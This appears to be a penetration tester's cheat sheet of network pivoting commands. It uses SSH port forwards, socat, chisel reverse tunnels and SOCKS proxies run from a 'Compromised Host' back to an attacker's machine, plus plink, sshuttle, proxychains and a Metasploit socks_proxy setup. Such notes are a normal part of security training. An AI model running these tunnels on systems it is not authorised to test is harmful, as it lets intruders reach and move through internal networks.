ssh user@<ip> -p port -L 8001:127.0.0.1:8080 -fN
ssh -R 5555:127.0.0.1:5555 -p2222 <user>@<ip>
./socat.exe TCP-LISTEN:8002,fork,reuseaddr TCP:127.0.0.1:8080
-> Your machine
./chisel server -p <LISTEN_PORT> --reverse &
-> Compromised Host
./chisel client <ATTACKING_IP>:<LISTEN_PORT> R:<LOCAL_PORT>:<TARGET_IP>:<TARGET_PORT> &
-> Compromised Host
./chisel server -p <LISTEN_PORT>
-> Your Machine
./chisel client <LISTEN_IP>:<LISTEN_PORT> <LOCAL_PORT>:<TARGET_IP>:<TARGET_PORT>
cmd.exe /c echo y | plink.exe -ssh -l <user> -pw <password> -R 192.168.0.20:1234:127.0.0.1:3306 192.168.0.20
sshuttle -r user@<ip> --ssh-cmd "ssh -i private_key" 172.16.0.0/24
edit /etc/proxychains.conf with socks4 127.0.0.1 8080
ssh -N -D 127.0.0.1:8080 <user>@<ip> -p 2222
-> Your Machine
./chisel server -p LISTEN_PORT --reverse &
-> Compromised Host
./chisel client <TARGET_IP>:<LISTEN_PORT> R:socks &
-> Compromised Host
./chisel server -p <LISTEN_PORT> --socks5
-> Your Machine
./chisel client <TARGET_IP>:<LISTEN_PORT> <PROXY_PORT>:socks
route add <ip>/24 1
route print
use auxiliary/server/socks_proxy
run